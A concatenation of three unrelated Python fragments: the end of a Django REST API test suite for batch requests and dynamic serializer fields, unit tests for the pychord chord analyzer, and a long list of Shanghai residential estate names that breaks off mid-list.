TEST_OBJECT_LABEL_EDITED}, 'method': 'PATCH', 'name': 'test_request', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_detail_api_view_name ), kwargs={'test_object_id': self.test_object.pk} ) } ] test_model_label = self.test_object.label self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 1) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_200_OK ) self.test_object.refresh_from_db() self.assertNotEqual(self.test_object.label, test_model_label) events = self._get_test_events() self.assertEqual(events.count(), 0) def test_edit_via_put_batch_api_request(self): self.grant_access( obj=self.test_object, permission=self.test_permission ) requests = [ { 'body': {'label': TEST_OBJECT_LABEL_EDITED}, 'method': 'PUT', 'name': 'test_request', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_detail_api_view_name ), kwargs={'test_object_id': self.test_object.pk} ) } ] test_model_label = self.test_object.label self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 1) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_200_OK ) self.test_object.refresh_from_db() self.assertNotEqual(self.test_object.label, test_model_label) events = self._get_test_events() self.assertEqual(events.count(), 0) def test_list_get_batch_api_request(self): self.grant_access( obj=self.test_object, permission=self.test_permission ) requests = [ { 'name': 'test_request', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_list_api_view_name ) ) } ] self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 1) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_200_OK ) self.assertEqual(response.data['results'][0]['data']['count'], 1) self.assertEqual( response.data['results'][0]['data']['results'][0]['id'], self.test_object.pk ) events = self._get_test_events() self.assertEqual(events.count(), 0) def test_mass_edit_get_batch_api_request(self): self.grant_access( obj=self.test_object, permission=self.test_permission ) requests = [ { 'name': 'test_object_list', 'url': reverse( viewname='rest_api:{}'.format( self._test_model_list_api_view_name ) ) }, { 'body': {'label': TEST_OBJECT_LABEL_EDITED}, 'iterables': ['test_object_list.data.results'], 'method': 'PATCH', 'name': 'test_object_edit', 'url': '{}{{{{ iterables.0.id }}}}/'.format( reverse( viewname='rest_api:{}'.format( self._test_model_list_api_view_name ) ) ) } ] test_model_label = self.test_object.label self._clear_events() response = self._request_batch_api_request_api_view( requests=json.dumps(obj=requests) ) self.assertEqual(response.status_code, status.HTTP_200_OK) self.assertEqual(response.data['count'], 2) self.assertEqual( response.data['results'][0]['status_code'], status.HTTP_200_OK ) self.assertEqual(response.data['results'][0]['data']['count'], 1) self.assertEqual( response.data['results'][0]['data']['results'][0]['id'], self.test_object.pk ) self.assertEqual( response.data['results'][1]['status_code'], status.HTTP_200_OK ) self.test_object.refresh_from_db() self.assertNotEqual(self.test_object.label, test_model_label) events = self._get_test_events() self.assertEqual(events.count(), 0) class DynamicFieldSerializerAPIViewTestCase( DynamicFieldSerializerAPIViewTestCaseMixin, BaseAPITestCase ): def _get_test_view_class(self, serializer_class): local_serializer_class = serializer_class class TestView(generics.RetrieveAPIView): lookup_url_kwarg = 'test_object_id' queryset = self.TestModelChild.objects.all() serializer_class = local_serializer_class return TestView def test_current_model_only_field_single(self): response = self._request_test_api_view( query={'_fields_only': 'test_field_3'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' not in data) self.assertTrue('test_field_3' in data) self.assertTrue('test_field_4' not in data) def test_current_model_only_field_multiple(self): response = self._request_test_api_view( query={'_fields_only': 'test_field_3,test_field_4'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' not in data) self.assertTrue('test_field_3' in data) self.assertTrue('test_field_4' in data) def test_current_model_only_rleated_field(self): response = self._request_test_api_view( query={'_fields_only': 'parent'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' not in data) def test_related_model_only_field_single(self): response = self._request_test_api_view( query={'_fields_only': 'parent__test_field_1'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' not in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' not in data) def test_related_model_only_field_multiple(self): response = self._request_test_api_view( query={ '_fields_only': 'parent__test_field_1,parent__test_field_2' } ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' not in data) def test_current_model_exclude_field_single(self): response = self._request_test_api_view( query={'_fields_exclude': 'test_field_3'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' in data) def test_current_model_exclude_field_multiple(self): response = self._request_test_api_view( query={'_fields_exclude': 'test_field_3,test_field_4'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' not in data) def test_current_model_exclude_related_field(self): response = self._request_test_api_view( query={'_fields_exclude': 'parent'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' not in data) self.assertTrue('test_field_3' in data) self.assertTrue('test_field_4' in data) def test_related_model_exclude_field_single(self): response = self._request_test_api_view( query={'_fields_exclude': 'parent__test_field_1'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' not in data['parent']) self.assertTrue('test_field_2' in data['parent']) self.assertTrue('test_field_3' in data) self.assertTrue('test_field_4' in data) def test_related_model_exclude_field_multiple(self): response = self._request_test_api_view( query={ '_fields_exclude': 'parent__test_field_1,parent__test_field_2' } ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' not in data['parent']) self.assertTrue('test_field_2' not in data['parent']) self.assertTrue('test_field_3' in data) self.assertTrue('test_field_4' in data) class DynamicFieldSerializerWithMixinAPIViewTestCase( DynamicFieldSerializerAPIViewTestCaseMixin, BaseAPITestCase ): auto_add_test_view = True auto_create_test_object = False test_view_url = r'^test-view-url/(?P<test_object_id>\d+)/$' def _get_test_view_class(self, serializer_class): local_serializer_class = serializer_class class TestView(ExternalObjectAPIViewMixin, generics.RetrieveAPIView): external_object_queryset = self.TestModelChild.objects.all() external_object_pk_url_kwarg = 'test_object_id' lookup_url_kwarg = 'test_object_id' queryset = self.TestModelChild.objects.all() serializer_class = local_serializer_class return TestView def test_related_model_only_field_single_with_api_view_mixins(self): response = self._request_test_api_view( query={'_fields_only': 'parent__test_field_1'} ) self.assertEqual(response.status_code, status.HTTP_200_OK) data = response.json() self.assertTrue('parent' in data) self.assertTrue('test_field_1' in data['parent']) self.assertTrue('test_field_2' not in data['parent']) self.assertTrue('test_field_3' not in data) self.assertTrue('test_field_4' not in data)
11588402
import unittest from pychord import Chord from pychord.analyzer import get_all_rotated_notes, find_chords_from_notes, notes_to_positions class TestNotesToPositions(unittest.TestCase): def test_one(self): pos = notes_to_positions(["C"], "C") self.assertEqual(pos, [0]) def test_power(self): pos = notes_to_positions(["C", "G"], "C") self.assertEqual(pos, [0, 7]) def test_major(self): pos = notes_to_positions(["D", "F#", "A"], "D") self.assertEqual(pos, [0, 4, 7]) def test_seventh(self): pos = notes_to_positions(["E", "G#", "B", "D"], "E") self.assertEqual(pos, [0, 4, 7, 10]) def test_add9(self): pos = notes_to_positions(["Ab", "C", "Eb", "Bb"], "Ab") self.assertEqual(pos, [0, 4, 7, 14]) def test_major_add_9(self): # major add 9 is the same as add9 self.test_add9() def test_ninth(self): pos = notes_to_positions(["F", "A", "C", "Eb", "G"], "F") self.assertEqual(pos, [0, 4, 7, 10, 14]) def test_eleventh(self): pos = notes_to_positions(["G", "B", "D", "F", "A", "C"], "G") self.assertEqual(pos, [0, 4, 7, 10, 14, 17]) def test_thirteenth(self): pos = notes_to_positions(["A", "C#", "E", "G", "B", "D", "F#"], "A") self.assertEqual(pos, [0, 4, 7, 10, 14, 17, 21]) class TestGetAllRotatedNotes(unittest.TestCase): def test_two(self): notes_list = get_all_rotated_notes(["C", "G"]) self.assertEqual(notes_list, [["C", "G"], ["G", "C"]]) def test_three(self): notes_list = get_all_rotated_notes(["C", "F", "G"]) self.assertEqual(notes_list, [["C", "F", "G"], ["F", "G", "C"], ["G", "C", "F"]]) class TestFindChordsFromNotes(unittest.TestCase): def _assert_chords(self, notes, expected_chords): """ Validates that the specified notes translated to the expected chords. :param notes: The notes of the chord, either as a list of strings, e.g. ["G", "C", "D"] or a string, e.g. "G C D" :param expected_chords: the chords that the notes could translate to, specified as a list of strings, e.g. [ "Gsus4", "Csus2/G" ], or a single string if only one chord expected. """ if isinstance(notes, str): notes = notes.split() c0 = find_chords_from_notes(notes) if isinstance(expected_chords, str): expected_chords = [expected_chords] self.assertEqual(c0, [Chord(c) for c in expected_chords]) def test_major(self): chords = find_chords_from_notes(["C", "E", "G"]) self.assertEqual(chords, [Chord("C")]) def test_major_on_third(self): chords = find_chords_from_notes(["F#", "A", "D"]) self.assertEqual(chords, [Chord("D/F#")]) def test_major_on_fifth(self): chords = find_chords_from_notes(["B", "E", "G#"]) self.assertEqual(chords, [Chord("E/B")]) def test_dim(self): chords = find_chords_from_notes(["Eb", "Gb", "A"]) self.assertEqual(chords, [Chord("Ebdim")]) def test_sus4(self): chords = find_chords_from_notes(["G", "C", "D"]) self.assertEqual(chords, [Chord("Gsus4"), Chord("Csus2/G")]) def test_dim6(self): chords = find_chords_from_notes(["Eb", "Gb", "A", "C"]) self.assertEqual(chords, [Chord("Ebdim7"), Chord("Gbdim7/Eb"), Chord("Adim7/Eb"), Chord("Cdim7/Eb")]) def test_aug(self): chords = find_chords_from_notes(["F", "A", "Db"]) self.assertEqual(chords, [Chord("Faug"), Chord("Aaug/F"), Chord("Dbaug/F")]) def test_add9(self): chords = find_chords_from_notes(["C", "E", "G", "D"]) self.assertEqual(chords, [Chord("Cadd9")]) def test_m7b5(self): chords = find_chords_from_notes(["F#", "A", "C", "E"]) self.assertEqual(chords, [Chord("F#m7-5"), Chord("Am6/F#")]) def test_m7dim5(self): chords = find_chords_from_notes(["F#", "A", "C", "E"]) self.assertEqual(chords, [Chord("F#m7-5"), Chord("Am6/F#")]) def test_add4(self): chords = find_chords_from_notes(["C", "E", "F", "G"]) self.assertEqual(chords, [Chord("Cadd4")]) def test_minor_add4(self): chords = find_chords_from_notes(["C", "Eb", "F", "G"]) self.assertEqual(chords, [Chord("Cmadd4")]) def test_minor7_add11(self): self._assert_chords("C Eb G Bb F", ["Cm7add11", "F11/C"]) def test_major7_add11(self): self._assert_chords("C E G B F", "CM7add11") def test_minormajor7_add11(self): self._assert_chords("C Eb G B F", "CmM7add11") def test_major7_add13(self): self._assert_chords("C E G A B D", "CM7add13") def test_idempotence(self): for _ in range(2): chords = find_chords_from_notes(["Eb", "Gb", "A", "C"]) self.assertEqual(chords, [Chord("Ebdim7"), Chord("Gbdim7/Eb"), Chord("Adim7/Eb"), Chord("Cdim7/Eb")]) self.assertEqual(chords[0].components(visible=True), ["Eb", "Gb", "A", "C"])
11588455
estate=[ "绿地崴廉公寓", "东方城市花园", "陆家嘴中央公寓", "明园森林都市", "品家都市星城", "金色黄浦", "东方星座", "上海康城", "海湾豪宅", "万科城市花园", "魅力之城", "山水别墅", "旗忠高尔夫", "康桥水都", "新江湾城", "上海梦想", "雍景苑", "紫丁香花园", "山水国际", "阳光威尼斯", "阳光欧洲城", "阳光国际公寓", "广兰名苑", "新湖明珠城", "南郊别墅", "地杰国际城", "大华锦绣华城", "绿地康桥新苑", "康桥老街", "白玉兰花园", "静安凤凰苑", "徐汇新城", "星河世纪城", "星月蓝湾", "金沙雅苑滨湖世家", "城市经典", "玉墅", "江南星城", "纯翠江南", "春申景城", "中星海上景庭", "万科蓝山小城", "经纬城市绿洲", "阳光水岸家园", "瑞虹新城优贤生活", "安亭新镇", "苏堤春晓名苑", "万邦都市花园", "夏朵小城", "华银坊", "贝越高行馨苑", "四季绿城", "富林四季", "诺丁区", "海上国际花园", "金外滩花园", "崇明新城明珠花苑", "中虹明珠苑", "春江锦庐", "嘉城", "金色奥斯卡", "金爵别墅", "上海春城", "世茂滨江花园", "华升新苑", "知雅汇", "志成花苑", "中远两湾城", "璀璨天成", "莘庄沁春园", "小沪春秋", "象源丽都", "上海奥林匹克花园", "丽江锦庭", "阳光神州苑", "蔚蓝城市花园", "金桥新城", "泰鸿新苑", "东方花园", "幸福小镇", "明丰绿都", "嘉利明珠城", "中鼎豪园", "巨峰家苑", "环元苑", "康河原味", "南洋博仕欣居", "冠龙家园", "风华水岸", "蓝色港湾", "博馨苑", "好莱坞花园", "星辰园", "涵合园", "静安桂花园", "爵士静安", "证大家园", "上海故事", "樱源晶舍", "佳龙花园", "万科假日风景4期", "生活的艺术", "中环明珠", "景明花园", "三盛颐景园", "恒大翰城国际", "上海绿城", "番禺大厦", "九歌名苑", "春申复地城", "柏林春天", "慧芝湖花园", "耀江国际广场", "市中心", "中梅苑", "上海紫园", "曲阳名邸", "卢湾都市花园", "水清华庭", "珠江新城", "沈默荷兰园", "金象大厦", "大城小室", "国际丽都城", "保利名园别墅", "舞榭园", "新申花城玉兰苑", "金地格林春岸", "棕榈湾花园", "延铁家园", "罗山精华", "通联阁", "睿园大厦", "金荣公寓", "中梅苑", "大华公园世家", "大华社区", "联业大厦", "上大社区", "天宝华庭", "怡泰家苑", "南天公寓", "青浦佳乐苑", "白雪公主", "阳光神州苑", "南新苑", "沪华公寓", "国际花园", "阳光威尼斯", "绿福公寓", "绿梅公寓", "鑫隆花园", "富邑华庭", "澄品金象华庭别墅", "水景苑", "汇金广场", "大名公寓", "四季全景台", "恒德花园", "华丽公寓", "中凯佘山别墅", "新风尚", "友力大厦", "金岛大厦", "玫瑰园", "九间堂", "万科兰乔圣菲", "建华新苑", "海波花苑", "兴日家园", "爵士阅", "长宏新苑", "海光公寓", "雅墅", "临泷佳苑", "龙柏中康公寓", "永新花苑", "佳成大厦", "中新公寓", "上海莘城", "都市情园", "百草园", "百乐公寓", "新月翡翠园", "盛大金磐", "源水新墅", "航天新苑", "时峰不夜城", "静安诺丁汉", "仙霞良品", "铭晖西郊苑", "汤臣豪园", "瑞金尊邸", "环龙新苑", "幸福春天", "鹏程花苑", "大华锦绣华城", "鑫城苑", "莘庄沁春园", "小沪春秋", "开元新都", "菊园", "汇豪天下", "凌兆人家", "泰宸景苑", "华尔道芙", "华菁南方公寓", "华丽家族", "上品巨洋豪园", "汇秀公寓", "星际公寓", "福泉苑", "绝对城市", "美地芳邻苑", "仙霞福运", "水岸枫叶", "新实地公寓", "爱法新城", "绿洲中环中心", "绿洲湖畔花园", "佘山月湖山庄", "海悦公寓", "丹枫苑", "银东大厦", "宝丽金大厦", "百盛园", "人才大厦", "名都城", "知汇名邸", "学林苑", "桃园", "瑞金花园", "中邦晶座·城市别墅", "佘山高尔夫", "现代缘墅", "集成公寓", "中祥金祥苑", "颐河苑", "香港丽园", "新家坡园景苑", "金日世家玉兰苑", "莘闵荣顺苑", "汇元坊", "紫荆新苑", "臻园", "万科城市花园", "魅力之城", "华高庭园", "顺风公寓", "扬子江家园", "怡君苑", "学苑风范", "仁德坊", "开元地中海", "联洋花园", "联洋年华", "天科苑", "蔚蓝海岸", "建国大厦", "云山星座苑", "新梅莘苑", "恒大翰城", "中辉新苑", "森陇家园", "共富鑫鑫花园", "虹桥高尔夫别墅", "大众家园", "贝越佳园", "金纬花苑", "广洋苑", "张杨水想曲", "思南公寓", "市中心", "凯阳新寓", "虹口金地汇", "今日丽园", "新华舍", "茗园南昌苑", "水清华庭", "建德坊", "瑞丰园", "骏豪国际", "凇宏苑", "强生花苑", "徐汇枫景", "上海年华", "瑞生花园", "水岸豪庭", "汇峰衡苑", "兴东佳苑", "懿文大厦", "上海知音", "华发小区", "海德花园", "白玉兰花园", "金淙苑家源", "陆家嘴生活中心", "百合花苑", "樱源晶舍", "东珂臻品", "明纶园", "东方莱茵", "长峰新村", "怡水新镇", "君悦静安", "新贵都万体景苑", "阳光四季公寓", "莲浦花苑", "自由自宅", "时代逸居", "高峰汇", "瑞南新苑", "泰鸿新苑", "绿野香洲", "团结花苑", "华济苑", "东苑新天地", "金汇花园", "金汇名人苑", "上影广场公寓", "四季绿城", "都市宜家", "北美枫情", "紫元大厦", "静安豪景", "西郊佳景苑", "墅博汇", "锦汇苑", "祁连新村", "半岛豪门", "名仕苑帝庭阁", "高安公寓", "金地格林世界", "金纺苑", "田林兰桂坊", "东湖大厦", "未来域", "锦绣年华", "美之苑", "嘉善公寓", "永泰花苑", "银马郡庭", "中星巨野公寓", "名人花苑", "杉林新月", "康健丽都", "永新花苑", "汇达苑", "环球中央花园", "富弘苑", "金虹大厦", "观景阁", "东湾小区", "金外滩花园", "南华苑", "华玉苑", "环线广场", "华府天地", "瑶成湾花园", "观景苑", "爱建城", "佳安公寓", "嘉宝都市港", "金桥新城", "紫虹嘉苑", "青之杰花园", "吴淞新城", "鑫城苑座", "生活艺术居", "新邻地", "嘉瑞花苑", "双五新家园", "伦敦广场", "东方伦敦花园", "均瑶国际广场", "生活艺术居", "新领地", "田林亲家", "东泉新村", "雪野别墅", "新芳邻", "宜居田林", "海上明珠园", "金铭福邸", "东方文苑", "阳光新景", "鑫泰园", "北方佳苑", "蔚蓝城市花园", "徐汇高公馆", "高欣公寓", "徐汇枫情", "明晖苑", "丽江锦庭", "山水别墅", "旗忠高尔夫", "金海湾", "康惠花苑", "十里都华", "兆丰帝景苑", "帝苑名品广场", "合家欢", "虹桥大仕馆", "大学源", "松云水苑国际社区", "家旺新苑", "城城金岛苑", "芳草苑", "泗海怡家", "岭南翠庭", "长华绿苑", "长发大厦", "绿地崴廉公寓", "皇骐爱丽舍", "康惠苑", "证大家园", "复地翠堤苑", "宏莲馨苑", "大唐盛世花园", "品味人家同德公寓", "福源汇居", "今和家园", "林茵香榭", "逸兴家园", "武宁苑", "逸仙华庭", "双秀家园", "华山正力公寓", "静巷府邸", "华升新苑", "新江湾城", "上海梦想", "雍景苑", "静安雅筑", "虹桥怡景苑", "虹桥加州花苑", "上海富宏花园", "慧芝湖花园", "盛世香樟园", "华林新苑", "龙柏新村", "同济艺墅", "贝越流明新苑", "汇元坊", "千诗万绿", "上海鸿禧花园", "滨河景城", "永汇新苑", "保利名园别墅", "舞榭园", "罗秀新苑", "七宝绿都", "宝虹新苑", "阳光欧洲城", "蔷薇绅邻", "都林嘉园", "茂盛花苑", "雅舍小品", "南郊花园", "虹桥万博花园", "花木白杨", "大上海国际花园", "翡翠苑", "沪航公寓", "金隆海悦", "金色维也纳", "上海莘城", "莘秀苑", "英伦生活", "恒大翰城", "瀚锦苑", "盛顺意苑", "美丽家园", "品家都市星城", "锦绣满堂", "博文园", "宛平南苑", "千代别墅", "澳丽花苑", "松风花园", "东方港湾·金杰", "华夏家", "川杨璟园", "阳光欧洲城", "源水新墅", "新梅花苑", "吉富绅花园", "绿地春申花园", "绿地春申花园", "浅水湾花园", "华轩大厦", "士博汇弘辉名苑", "四季晶园", "上海大花园", "滨江兰庭", "滨江国际", "东南华庭", "东方知音", "河滨传奇", "河畔明珠公寓", "虹桥上海城", "虹桥豪苑", "圣天地", "森香水筑", "光鸿苑", "欣武大厦", "山水国际", "静安晶华园", "济阳人家", "莲浦新苑", "春江锦庐", "风和俪墅", "蕙兰苑", "澳丽花苑", "景江苑", "丽水香郡", "河滨香景园", "德福苑", "爱博大厦", "古北国际广场", "精英会", "颐峰苑", "云福大厦", "外高桥荷兰城", "布鲁克林", "中海馨苑", "明日新苑", "禄德嘉苑", "竹韵浩庭", "克拉水城", "未来世界", "舒城苑", "皇府别墅", "静安艺阁", "蓝色港湾", "博馨苑", "盛大花园", "紫苑小区", "海信花苑", "维也纳坡景森墅", "大运盛城", "水岸家园", "三春汇秀苑", "兆丰帝景苑", "新都城公寓", "金桥立方城", "紫藤居", "天阁公寓", "新城名庭", "海欣公寓", "城市丽景", "泰燕华庭", "曹杨君悦苑", "龙距大厦", "海德公寓", "景沧公寓", "周庄江南人家", "都林龙苑", "丽茵别墅", "星罗苑", "新华别庄", "顺达苑", "绿洲比华利花园", "西南名苑", "明杨豪苑", "在水一方", "欢喜临门", "金沙丽晶苑", "商务先锋", "东方名园", "黄金水岸", "嘉德公寓", "中星海上景庭", "宜德苑", "天杰徐汇", "嘉里华庭", "百富达公寓", "好世麒麟园", "中华淮海中华大厦", "嘉禄新苑", "金杨馨苑", "嘉定颐景园", "城市经典", "玉墅", "嘉禄新苑", "东方龙苑", "莱顿小城", "桃花源田庄", "世袭领地", "东苑大千美墅", "天元公寓", "天枫公寓", "古北红人馆", "丰泽湾", "巴黎春天", "博爱家园", "丽都大厦", "静安阳光名都", "古浪苑", "海东公寓", "长宁鉴筑", "宜嘉坊", "明月星河", "华丰佳园", "宁和公寓", "益丰新村", "东晶国际", "陆家嘴自由空间", "雅仕兰庭伊顿公寓", "龙腾苑", "蝶恋园", "金风玉露", "虹桥中园", "四季草堂", "金都花好月圆", "怡东花园", "绿庭百合苑", "新天地河滨花园", "雅仕轩", "金露苑", "天歌花园", "明光苑", "嘉瑞花苑", "双五新家园", "洪山花苑", "幸之苑", "钻石城中城", "瑞金福地", "福华花苑", "金顶公寓", "达安圣芭芭花园", "春辉苑", "金色港湾公寓", "八方大厦", "中鼎豪园", "爱法花园", "黄浦新殿", "佳日公寓", "紫光大厦", "尚城捷座", "中祥龙柏苑", "中皇广场", "智慧岭秀", "写意春秋", "双城苑", "枫景家园", "致远大厦", "西郊名邸", "东沟新村", "金玉良苑", "世博明珠", "明珠家园", "郁庭峰", "锦绣天第", "书香门第", "新山龙", "申江豪城", "人和家园", "外滩新视界", "宏惠花苑", "爱法新都", "金海岸花园", "巨富大厦", "莘都丽景", "新珠苑", "金桥都市花园", "三岛龙州苑", "虹桥河滨花园", "绿带风光", "望景苑", "罗山花苑", "金色碧云", "南江苑", "胜康廖氏大厦", "大宁家园", "颐景山水", "华南名苑", "圣堡", "淮海中华大厦", "新理想家园", "恒大华城", "上河苑", "宝宸怡秀园", "吴淞三街坊", "东郊花园", "元一新苑", "环龙新纪园", "阳光欧洲城", "阳光国际公寓", "乾恩园", "现代律感乾清园", "东明苑", "莎海惠晨苑", "阳光巴黎", "上海领地", "南国龙苑", "南林公寓", "盛和玲珑", "原舍", "悉尼阳光", "盛族家园", "世华佳苑", "桃源清水居", "徐汇高公馆", "高欣公寓", "同济吉品", "同科公寓", "锦澳家园", "华元豪庭", "爱嘉苑", "明珠东苑", "大华水岸蓝桥", "华丽家园", "赏翠时代", "新家静品", "金色贝拉维", "新明星花园", "雍江星座", "香园", "瑞达苑", "新古北国际花园", "金鼎花苑", "绿宝园", "新芳邻", "原顾路阳光苑", "巨峰家苑", "环元苑", "阳光新居", "华丰苑", "新都花苑", "上海早晨", "凌兆大厦", "环球翡翠湾", "君临颐和花园商铺", "东泰花苑", "锦南花苑", "枫桦景苑", "百草园百乐公寓", "东渡园景别墅", "凌云公寓", "月厦新天地", "绿地大楼", "风荷云墅", "罗山新人家", "世纪左岸", "源城锦苑", "绿洲康城", "莱茵半岛苑", "万兆家园", "叠彩人家", "金都雅苑", "滨江雅苑", "中星凉城苑", "金桥湾", "南块", "城市艺术季", "广洋新景苑", "汇贤居", "古北星期八", "东上海新城", "三林城", "夏朵小城", "华银坊", "东苑利景花苑", "塞纳", "左岸", "信和花园", "昌鑫花园", "广德苑", "文化名邸", "江南苑", "阳光欧洲城", "平盛苑", "长岛别墅", "银泰花园", "国际俪晶", "太古豪庭", "明华大厦", "张杨花苑", "繁盛苑", "金水湾别墅", "远景时代", "天山平塘人家", "星辰园", "世福汇", "大宁绿湾", "宁泰馨苑", "光鸿花苑", "贝越高行馨苑", "叠翠上南", "现代星洲城", "星洲阳光", "北美精典", "夏州花园", "金象大厦", "大城小室", "香歌丽园", "未来视界", "舒城苑", "京城大厦", "弘泽阳光园", "中远两湾城", "璀璨天成", "掬水轩", "越秀苑", "凯旋豪庭", "美丽园公寓", "中星凉城西苑", "上安大厦", "清涧花苑", "湘江大厦", "虹桥阳光", "远景时代", "步高苑", "森海豪庭", "虹桥大名人", "上海万里城", "巴黎之春", "易时代", "山鑫康城", "显赫人生", "绿苑半岛", "翡翠名人府", "福海公寓", "盈港公寓", "宏润花园", "金汇五街坊", "海富花园", "赛杰苑", "东苑绿世界", "嘉和花苑", "爱莲屋", "泾南一街坊", "海森国际大厦", "淮海晶华", "君临頣和花园", "锦河苑", "金色家园", "缘锦园", "培花久远公寓", "绿泉家苑", "公园景秀", "天安嘉富丽苑", "凌兆佳苑", "丽都黄金走廊", "爱伦坡艺墅", "古北新苑", "天安花园", "虹桥领地", "星源佳苑", "中通雅苑", "由由新村", "园中苑", "苏州伯恩国际酒店", "孔雀王朝", "云间水庄", "明日星城世纪星", "申江远景", "宝林春天", "望族新城", "学府双星", "通德苑", "阳光公寓", "龙腾浦江", "新凤城", "银座公寓", "林与堂", "运银公寓", "中福城", "海上花", "恒阳花苑", "江南宴花园", "富华苑", "嘉华苑", "兴平昌苑", "恒升半岛国际中心", "昌鑫世纪园", "中环家园", "上海万里城", "万佳苑", "世纪时空", "新普盛公寓", "惠德公寓", "住嘉新苑", "西郊园中园", "明月花园", "同济公寓", "河滨围城", "美丽岛", "淞南九村新苑", "河畔花园城", "多摩园景", "雅士公寓", "东方花园", "景博新园", "悦景苑", "文轩苑", "南文大厦", "龙柏山庄", "住友宝莲花园", "万科假日风景", "临湖轩", "湖南大厦", "黄浦花园玫瑰湾", "静安新格公寓", "云顶别墅", "嘉德坊", "新申花城玉兰苑", "金轩大邸", "春申城都市苑", "中华苑", "康桥华庭", "东方鹿特丹", "莘华世家", "德昌公寓", "迎宾花园", "水景豪园", "蓝朝部落", "曹杨花苑", "和合苑", "新里城", "金沙嘉年华", "城市星光", "沪中新苑", "东新苑", "罗山怡景苑", "东新大厦", "全家福", "中岚大楼", "中环国际", "黄金豪园", "嘉里华庭", "世纪之门", "半岛花园", "复地香堤苑", "张江汤臣豪园", "摩登之城", "碧云新天地家园", "芳华公寓", "景谷苑", "佘山天邻别墅", "祜欣公寓", "上海知音", "汇峰鼎园", "中宁家园", "武夷花园", "曹杨华庭", "黄山始信苑", "八月桂林", "怡德苑", "美树名家", "佳源时代华苑", "维多利广场", "汤臣海景", "学森龙园", "星林苑", "澳门新苑", "嘉苑别墅", "虹桥馨苑", "上海徐家汇", "汇翠花园", "金沙江公寓", "宝地东花园", "凯悦公寓", "当代徐家汇", "海棠园景", "月亮湾", "第五大道", "东方中华园", "海欣城", "银都佳园", "榴云新村", "上海本色", "佳邸别墅", "嘉怡苑", "新城名园", "上安公馆", "通联苑", "富丽花苑", "金桥新家园", "理享家", "龙馨嘉园", "申江花苑", "梅山馨苑", "世纪凯厦", "枫桥湾名邸", "元一新苑", "嘉泰花园公寓", "漕河景苑", "月河", "好享家", "泰荣苑", "上青佳园", "界龙阳光苑", "长发花园", "颐宁苑", "富友嘉园", "紫薇阁", "申地公寓", "爱丁堡公寓", "长宏新苑", "地杰国际城", "欧洲豪庭", "韵都城", "大庭广中", "万里苑", "逸仙二村", "水岸豪苑", "牡丹园", "新逸仙公寓", "滨江龙居苑", "莲锦苑", "花语墅", "盈嘉园", "文华苑", "太湖翠峰山庄", "欧洲映象", "燕宁苑", "公园天下莘纪苑", "精武大厦", "明安馨苑", "新锦港花园", "喜福会", "美好家", "枫涧美墅", "万荣阳光苑", "流晶逸彩", "共富四村", "上海捷克住宅小区", "浦江之星", "馨虹苑", "宏裕苑", "天馨花园", "华馨苑", "爵世美墅", "湖山在望", "恬园风云汇", "天宝绿洲公寓", "灵艺大厦", "东方丽景", "伟业金锦苑", "信联公寓", "众望城", "上大聚丰园", "惠龙公寓", "中虹汇之苑", "春之声", "中星公寓", "新世纪花苑", "康德公寓", "生活新家", "绿地剑川新苑", "未名园", "公园桂冠", "金燕家苑", "七浦公寓", "绿水家园", "紫都上海晶园", "恒大华城", "东林苑", "金甸大楼", "圣特丽墅", "印象派", "嘉富丽花园", "昌里花园", "现代映象", "金纺小区", "番禺大厦", "枫桥湾名邸", "海逸半岛", "梦里水乡", "光鸿苑", "爱建新家园", "张江交江大楼", "绿邑新境", "欣晟家园", "申地公寓", "月夏香樟林", "樟馨家园", "浦江名邸", "现代星洲城", "乐业公寓", "静安凤凰苑", "春申复地城", "柏林春天", "晟业佳苑", "东宫世家", "宝通公寓", "金帝城市岸泊", "中星长岛苑", "水丰嘉园", "永和新城", "永和丽园", "明园森林都市", "临汾花园", "中皇广场", "中皇", "外滩", "东新大楼", "瑞禾明苑", "星语馨苑", "上泰雅苑", "远景时代", "天宝公寓", "南都白马花园", "绿洲尧舜公寓", "都林龙苑", "理想国爱甸苑", "幽澜苑", "上海临汾名城", "上海阳城", "长城苑", "金华阁", "宝莲府邸", "西部秀苑", "屹立家园", "三泉公寓", "夏洲花园", "松江世纪新城", "明丰文化苑", 